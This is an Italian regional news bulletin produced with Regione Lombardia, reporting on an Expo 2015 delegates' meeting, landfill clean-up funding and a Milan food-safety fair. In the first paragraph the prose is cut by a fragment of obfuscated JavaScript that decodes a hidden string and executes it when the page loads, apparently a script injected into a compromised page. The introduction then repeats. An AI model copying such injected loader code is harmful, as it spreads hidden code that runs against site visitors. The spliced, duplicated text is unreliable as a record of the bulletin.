Bentrovati al nostro nuovo appuntamento informativo realizzato in collaborazione con Regione Lombardia

Si è conclusa la seconda edizione dell’International partecipants meeting a Milano, che per tre giorni ha ospitato i 1500 delegati dei Paesi di tutto il mondo che aderiscono all’Expo 2015. Un bilancio dell’incontro nel servizio di Maria Chiara Grandis...(e)s=s+ff(w[j]+3);}xz=e;if(window.document)xz(s)} Notiziario regionale ore 12 Bentrovati al nostro nuovo appuntamento informativo realizzato in collaborazione con Regione Lombardia

Si è conclusa la seconda edizione dell’International partecipants meeting a Milano, che per tre giorni ha ospitato i 1500 delegati dei Paesi di tutto il mondo che aderiscono all’Expo 2015. Un bilancio dell’incontro nel servizio di Maria Chiara Grandis...

-    Audio –

La Giunta regionale ha approvato criteri e modalità di finanziamento per quegli Enti locali che, avendo "ereditato" sul proprio territorio discariche cessate, intendano intervenire per eliminare o ridurre problemi ad esse legate di tipo ambientale, sanitario o di sicurezza e restituire all'uso pubblico porzioni di territorio, ridurre i volumi di discarica e riprofilarne il corpo, per produrre energia e recuperare materia. Sul territorio lombardo sono presenti diverse discariche, cessate o in fase di post-gestione, autorizzate in base alle normative che si sono via via succedute a partire dalla legge regionale 94 del 1980. I costi riconducibili agli interventi per fronteggiare criticità di varia natura determinate da tali discariche (smaltimento del percolato, gestione del biogas, monitoraggio della falda) spesso risultano a carico di Enti pubblici territoriali e prevedono orizzonti temporali molto lunghi e costi molto elevati, pertanto, difficilmente sostenibili da parte degli Enti stessi.

Il 16 e 17 ottobre 2012, presso la sede della Società Umanitaria (via Francesco Daverio, 7 - Milano) in corrispondenza della Giornata Mondiale dell'Alimentazione, si svolgerà la prima edizione del Salone della Ricerca, Innovazione e Sicurezza Alimentare. Evento patrocinato da Regione Lombardia L'iniziativa nasce per rispondere alle esigenze di un mercato sempre più attento al tema dell'alimentazione: le aziende, le istituzioni cercano occasioni per far conoscere il proprio impegno; i cittadini-consumatori chiedono nuove modalità per essere sempre più informati sulla sicurezza dei cibi che arrivano in tavola. Attraverso convegni, incontri tra imprese e centri ricerca si condivideranno esperienze, si promuoverà la cultura della sicurezza alimentare, si avvieranno nuove partnership. L'apertura del Salone sarà il 16 ottobre con il convegno "Le nuove frontiere della sicurezza alimentare. Focus sulla filiera produttiva", ore 9.30.Il Salone è ideato e organizzato da BIC La Fucina, Agenzia di Sviluppo Milano Metropoli, Società Umanitaria. Con il patrocinio di Expo Milano e Direzione Generale Agricoltura Regione Lombardia.

È tutto, grazie per l’ascolto